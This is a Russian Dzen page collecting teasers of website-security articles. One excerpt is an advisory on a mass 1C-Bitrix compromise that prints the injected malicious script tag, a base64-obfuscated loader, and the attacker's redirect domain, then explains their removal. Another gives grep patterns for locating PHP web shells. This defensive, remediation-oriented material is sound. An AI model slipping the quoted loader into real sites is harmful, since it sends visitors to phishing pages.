Найти в Дзене
Информационная безопасность

Информационная безопасность

Цикл статей посвященных безопасности сайтов.
подборка · 13 материалов
3 года назад
Борьба со СПАМ записями на примере CMS Wordpress
Появление нежелательной информации на сайте всегда несет в себе крайне негативные последствия для владельца веб ресурса. Например, сгенерированный злоумышленником контент может попасть под индексацию поисковой системы и вызвать появление не релевантных страниц на сайте, а в некоторых случаях даже вызвать блокировку со стороны поисковой системы (попадание сайта в черный список). Каким образом может генерироваться нежелательная спам запись? Рассмотрим конкретную ситуацию на примере популярной CMS wordpress...
3 года назад
Массовый взлом CMS 1С Bitrix (ошибка 500 на сайте). В настоящий момент наблюдается всплеск взломов CMS 1С Bitrix. Злоумышленники используют уязвимость в модуле «vote» CMS Bitrix до версии 22.0.400, которая позволяет записать произвольные файлы в уязвимую систему посредством отправки специально сформированных пакетов. В настоящий момент вредоносная вставка была добавлена злоумышленником с ошибкой, в строке кода был добавлен знак переноса "\n", что вызывает критическую ошибку на сайте (ошибка 500). Как должен был работать данный сценарий: Злоумышленник загружает на веб-сайт модифицированный файл (/bitrix/modules/main/include/prolog.php), в который добавляется строка -\n<script src="https://storejscdn.pw/jqueryui.js"></script>;(домен может изменяться). Эта строка кода вызывает удаленный скрипт jquery-ui.js. В коде jquery-ui.js , написано условие, что, если переход пользователя на зараженный сайт осуществлен из поисковой системы в первые за сутки, то открывается URL-адрес otrasoper[.]ga/help/?23211651614614, который осуществляет переадресацию пользователей российского сегмента сети Интернет на фишинговые сайты различных маркетплейсов. Как исправить ? Нужно, отредактировать файл /bitrix/modules/main/include/prolog.php удалив из него строку \n<script src="https://storejscdn.pw/jqueryui.js"></script>; (домен может изменяться) Также нужно проверить наличие в файлах: bitrix/js/main/core/core.js bitrix/templates/cm_main/js/jquery-1.10.2.min.js Подобной строки: s=document.createElement(`script`);s.src=atob(`aHR0cHM6Ly90ZWNobWVzdG9yZS5wdy9qcXVlcnktdWkuanM=`);document.head.appendChild(s); Ее также следует удалить. В целях избежания повторения ситуации рекомендуем отключить или удалить модуль «vote».
3 года назад
Наиболее распространенные ошибки администратора веб-ресурса
При заражении ресурса вредоносным содержимым у владельца сайта появляется множество неприятных хлопот. Казалось бы недавно работающий и приносящий прибыль ресурс перестает быть таковым и в некоторых случаях начинает работать в убыток. Поисковые системы перестают индексировать сайт, вместо корректного описания в поисковой выдаче потенциальные клиенты наблюдают неприятное сообщение: Сайт может угрожать безопасности вашего компьютера или мобильного устройства. Не стоит объяснять какой будет реакция...
3 года назад
DDoS-атака. Что это такое ?
DDoS-атака - это попытка злоумышленником нарушить нормальный трафик целевого сервера, сети или конкретного сайта путем перегрузки цели или окружающей ее инфраструктуры потоком интернет-трафика. DDoS-атаки достигают эффективности за счет использования множества скомпрометированных компьютерных систем в качестве источников атакующего трафика. Эксплуатируемые удаленные машины могут включать компьютеры и другие сетевые ресурсы, например устройства Интернета вещей. Если немного абстрагироваться, то...
3 года назад
Быстрый поиск шеллов в joomla, wordpress и dle (wp-conf.php, index_backup.php)
Если вы знакомы с ssh и командной строкой Linux(unix), и ваши сайты на joomla, wordpress, dle взломали в автоматическом режиме (обычно при этом появляются wp-conf.php, index_backup.php и .htaccess файлы с редиректами на index_backup.php), приведенный ниже список команд позволит вам быстро найти и удалить большую часть шеллов: find . -name '*.php' -exec grep -l '$msg=@gzinflate(@base64_decode(@str_replace' {} \; > rem01.txt find ./images/ -name '*.php' > rem02.txt find . -name '*.php' -exec grep -l 'preg_replace("/\...
3 года назад
Профилактика безопасности сайта
Для того, чтобы сайт работал стабильно и приносил определенную выгоду, необходимо постоянно следить за общим уровнем безопасности на нем, если игнорировать профилактические меры, владелец сайта может столкнуться с широким рядом проблем. К таким проблемам можно отнести: Важно понимать, что если своевременно проводить профилактический работы по обеспечению безопасности, то можно снизить вероятность взлома ресурса. В эти...